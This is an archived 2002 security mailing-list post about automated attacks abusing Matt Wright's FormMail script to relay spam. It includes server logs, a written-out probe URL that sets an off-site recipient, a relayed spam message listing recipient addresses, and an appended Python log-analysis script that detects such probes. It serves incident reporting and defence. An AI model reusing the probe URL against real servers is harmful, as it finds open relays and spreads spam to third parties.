Security Incidents mailing list archives

Re: Matt Wright FormMail Attacks


From: "Mike Lewinski" <mike () rockynet com>
Date: Mon, 14 Jan 2002 10:30:32 -0700

Looks like people are not serious about this probe. Does anybody know why the
number of formmail.pl attacks is growing? Maybe it is part of a SPAM
toolkit or some very popular tool?

Yes, I've seen (and reported) what appear to be automated probes for
vulnerable installations. We had a client install that script on one of our
servers and I was fortunate to notice the bounces coming back to us very
quickly.

I am including two reports I filed, in case the log patterns are of use to
anyone. Note that in the first probe below, the attacker's subject line
identifies the server that was attempted.

Mike

------------------------------------------------------------------------------------------------

1) Failed probe:

GMT offset is -0700. This is a probe for a formmail.pl cgi script that can
be used to relay spam. It generated a 404 here.

Session Details
  IP Address        65.34.109.21
  Reverse DNS       6534109hfc21.tampabay.rr.com
  Time Spent        0 min
  Hits / Kilobytes  1 / 0.61Kb
  Browser Tag       Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)
  Referring URL

Date and Time        URL
  2002-01-07 19:20:24  /cgi-bin/formmail.pl?email=f2%40aol%2ecom&subject=www%2ecoloradowild%2eorg%2fcgi%2dbin%2fformmail%2epl&recipient=bxw%40aol%2ecom&msg=w00t


------------------------------------------------------------------------------------------------

2) Successful relays:

The log times below are set to UTC, and were recorded on Jan 01, 2001. Also
attached is a sample of the bounced spam that was relayed through this
client's script (now disabled).

00:52:59 63.199.200.93 POST /cgi-bin/formmail.pl - 502 564 343 80 Microsoft+URL+Control+-+6.00.8862 -
00:52:59 63.199.200.93 POST /cgi-bin/formmail.cgi - 200 10590 345 80 Microsoft+URL+Control+-+6.00.8862 -

13:17:51 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 9515 1737 80 Microsoft+URL+Control+-+6.00.8862 -
21:07:30 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11401 1182 80 Microsoft+URL+Control+-+6.00.8862 -
21:15:23 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11562 1495 80 Microsoft+URL+Control+-+6.00.8862 -
21:16:27 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 9515 1329 80 Microsoft+URL+Control+-+6.00.8862 -
21:26:07 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11780 1554 80 Microsoft+URL+Control+-+6.00.8862 -
21:28:54 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11462 1241 80 Microsoft+URL+Control+-+6.00.8862 -
21:35:09 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11615 1391 80 Microsoft+URL+Control+-+6.00.8862 -
21:40:39 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11323 1108 80 Microsoft+URL+Control+-+6.00.8862 -
21:42:33 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11549 1331 80 Microsoft+URL+Control+-+6.00.8862 -
21:42:58 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11535 1316 80 Microsoft+URL+Control+-+6.00.8862 -
21:43:26 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11674 1459 80 Microsoft+URL+Control+-+6.00.8862 -
21:43:56 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11930 1705 80 Microsoft+URL+Control+-+6.00.8862 -
21:44:07 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11344 1121 80 Microsoft+URL+Control+-+6.00.8862 -
21:45:14 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11817 1589 80 Microsoft+URL+Control+-+6.00.8862 -
21:49:47 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 8597 1477 80 Microsoft+URL+Control+-+6.00.8862 -
21:55:43 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11695 1250 80 Microsoft+URL+Control+-+6.00.8862 -
22:06:03 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 565 1364 80 Microsoft+URL+Control+-+6.00.8862 -
22:07:13 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 565 1601 80 Microsoft+URL+Control+-+6.00.8862 -
22:07:13 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 565 1336 80 Microsoft+URL+Control+-+6.00.8862 -
22:09:38 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1308 80 Microsoft+URL+Control+-+6.00.8862 -
22:11:06 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1533 80 Microsoft+URL+Control+-+6.00.8862 -
22:18:28 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1580 80 Microsoft+URL+Control+-+6.00.8862 -
22:18:34 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 345 1236 80 Microsoft+URL+Control+-+6.00.8862 -


Note that this spam sample matches the log line above (repeated here) by
timestamp. It does not otherwise show the originating IP in the headers (a
flaw in Blat IMHO):

21:07:30 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11401 1182 80 Microsoft+URL+Control+-+6.00.8862 -


Received: from  rockynet.com (smtp.rockynet.com [206.168.216.11]) by
rly-xc01.mx.aol.com (v83.18) with ESMTP id MAILRELAYINXC17-0101160728; Tue,
01 Jan 2002 16:07:28 -0500
Received: from web3 [206.168.216.8] by rockynet.com
  (SMTPD32-7.04) id A5112EDA00F2; Tue, 01 Jan 2002 14:07:29 -0700
Date: Tue, 01 Jan 2002 14:07:29 -0700
From: arkansas () candycanelane com
Sender: webmaster () rockynet com
Reply-to: webmaster () rockynet com
Subject: Need Extra Money? O794A2kx7cob4zQ
To: diana63814 () aol com, laver76 () aol com, pologuy21 () aol com,
diana63828 () aol com,
        shanlynn () aol com, diana639 () aol com, laver7 () aol com, budmld () aol com,
        shanlynne () aol com, budmlh58 () aol com, alisha4972 () aol com,
        geoander () aol com, budmmann2 () aol com, shanlynng () aol com,
        tomdawgo7 () aol com, mlewis9106 () aol com, jens235 () aol com,
        jens239 () aol com, budmn151 () aol com
X-Mailer: WinNT's Blat ver 1.8.2b http://www.interlog.com/~tcharron
Message-Id: <200201011407277.SM00203@web3>

This is an online application from
 (arkansas () candycanelane com) on Tuesday, January 1, 2002 at 14:07:29
-------------------------------------------------------

:                                   <br><HTML><FONT  BACK="#ffffff"
style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10><BR><BR>EARN MONEY
WORKING AT HOME<BR>WORK THE HOURS YOU WANT<BR><A
HREF="aol:/2000:http://www.ckoejzldwoji.com () tiffany6811 tripod com/#jcispqeq
vxunb">CLICK HERE</A> FOR
DETAILS<BR><BR></FONT></HTML><br><p><br><p><br><p><br><p><br><p><br><p>28D0c
k0SFAK7tb6jNInX7sPazoxX30PrqyoY06k9hp8dSUb5954vAVs95214lW6L28D0ck0SFAK7tb6jN
InX7sPazoxX30PrqyoY06k9hp8ddx7mJEj2544dJLaA21M1tM3B8QT7ls9CVQUFcjYrWYoG43YiE
wfO09

-------------------------------------------------------



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
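The two reports above show the two log signatures worth alerting on: a GET probe whose `recipient` points off-site and whose `subject` echoes the host being tested, and a run of POSTs to formmail.pl/formmail.cgi from one source that come back 200. The script below is an added example, not part of Mike's post or of FormMail itself. It assumes IIS W3C extended logging with the field order `time c-ip cs-method cs-uri-stem cs-uri-query sc-status sc-bytes cs-bytes s-port cs(User-Agent) cs(Referer)` (inferred from the lines above, not stated in the post), an assumed per-site list of domains FormMail is allowed to deliver to, and the heuristic Mike used here that a 200 on a POST means the script accepted the submission. The sample log is constructed: the probe line is the report-1 request rewritten into that format, the POST lines are copied from report 2, and one unrelated hit is added to show it is ignored.

```python
"""Flag FormMail relay probes and apparent relays in IIS W3C extended logs.

Added example for the Security Incidents thread on Matt Wright FormMail
attacks. The field order and the allowed-domain list are assumptions.
"""
import re
from collections import Counter
from urllib.parse import parse_qs

# Assumed: domains this site's FormMail is legitimately allowed to mail.
LOCAL_MAIL_DOMAINS = {"coloradowild.org", "rockynet.com"}

# Both script names seen in the post.
FORMMAIL_RE = re.compile(r"/formmail\.(pl|cgi)$", re.IGNORECASE)

# Constructed sample log (see lead-in). Field order is assumed:
# time c-ip method uri-stem uri-query status sc-bytes cs-bytes port ua referer
SAMPLE_LOG = """\
19:20:24 65.34.109.21 GET /cgi-bin/formmail.pl email=f2%40aol%2ecom&subject=www%2ecoloradowild%2eorg%2fcgi%2dbin%2fformmail%2epl&recipient=bxw%40aol%2ecom&msg=w00t 404 612 0 80 Gozilla/4.0+(compatible;+MSIE+5.5;+windows+2000) -
00:52:59 63.199.200.93 POST /cgi-bin/formmail.pl - 502 564 343 80 Microsoft+URL+Control+-+6.00.8862 -
00:52:59 63.199.200.93 POST /cgi-bin/formmail.cgi - 200 10590 345 80 Microsoft+URL+Control+-+6.00.8862 -
21:07:30 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11401 1182 80 Microsoft+URL+Control+-+6.00.8862 -
21:15:23 66.125.153.7 POST /cgi-bin/formmail.cgi - 200 11562 1495 80 Microsoft+URL+Control+-+6.00.8862 -
22:06:03 66.125.153.7 POST /cgi-bin/formmail.cgi - 502 565 1364 80 Microsoft+URL+Control+-+6.00.8862 -
12:00:00 10.0.0.5 GET /index.html - 200 2048 300 80 Mozilla/4.0 -
"""


def parse_line(line):
    """Split one log line into a dict using the assumed field order."""
    parts = line.split()
    if len(parts) < 10:
        return None
    time, ip, method, stem, query, status, sc_bytes, cs_bytes, port = parts[:9]
    return {
        "time": time,
        "ip": ip,
        "method": method,
        "stem": stem,
        "query": None if query == "-" else query,
        "status": int(status),
        "sc_bytes": int(sc_bytes),
        "cs_bytes": int(cs_bytes),
        "ua": parts[9],
        "referer": parts[10] if len(parts) > 10 else "-",
    }


def probe_details(query):
    """Percent-decode a FormMail GET probe's query string.

    Returns (subject, recipient). In the probe above the attacker put the
    target host and path in 'subject' so the bounce/success mail tells them
    which server is open; 'recipient' is the off-site address they control.
    """
    params = parse_qs(query)
    subject = params.get("subject", [""])[0]
    recipient = params.get("recipient", [""])[0]
    return subject, recipient


def recipient_is_offsite(addr):
    """True when the mail domain is not one this site's FormMail should serve."""
    domain = addr.rpartition("@")[2].lower()
    return bool(domain) and domain not in LOCAL_MAIL_DOMAINS


def analyse(log_text):
    """Return (probes, relays).

    probes: GET requests to a FormMail script naming an off-site recipient,
            with the host the attacker echoed in 'subject'.
    relays: per source IP, the number of POSTs to a FormMail script that
            returned 200 (heuristic: the script accepted the submission;
            POST bodies are not logged, so the recipient cannot be checked).
    """
    probes = []
    relays = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not FORMMAIL_RE.search(rec["stem"]):
            continue
        if rec["method"] == "GET" and rec["query"]:
            subject, recipient = probe_details(rec["query"])
            if recipient_is_offsite(recipient):
                probes.append({"ip": rec["ip"], "time": rec["time"],
                               "target": subject, "recipient": recipient,
                               "status": rec["status"]})
        elif rec["method"] == "POST" and rec["status"] == 200:
            relays[rec["ip"]] += 1
    return probes, dict(relays)


if __name__ == "__main__":
    found_probes, found_relays = analyse(SAMPLE_LOG)
    for p in found_probes:
        print(f"probe from {p['ip']} at {p['time']}: target={p['target']} "
              f"recipient={p['recipient']} status={p['status']}")
    for ip, n in sorted(found_relays.items(), key=lambda kv: -kv[1]):
        print(f"{n} apparent relay(s) via POST from {ip}")
```

Run against a real IIS log the probe count tells you who is scanning, and a source IP with more than a handful of 200 POSTs is the signal to pull the script and check the mail queue for bounces like the Blat sample above. The 502s at the end of report 2 are not counted as relays; the log alone does not say what caused them.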

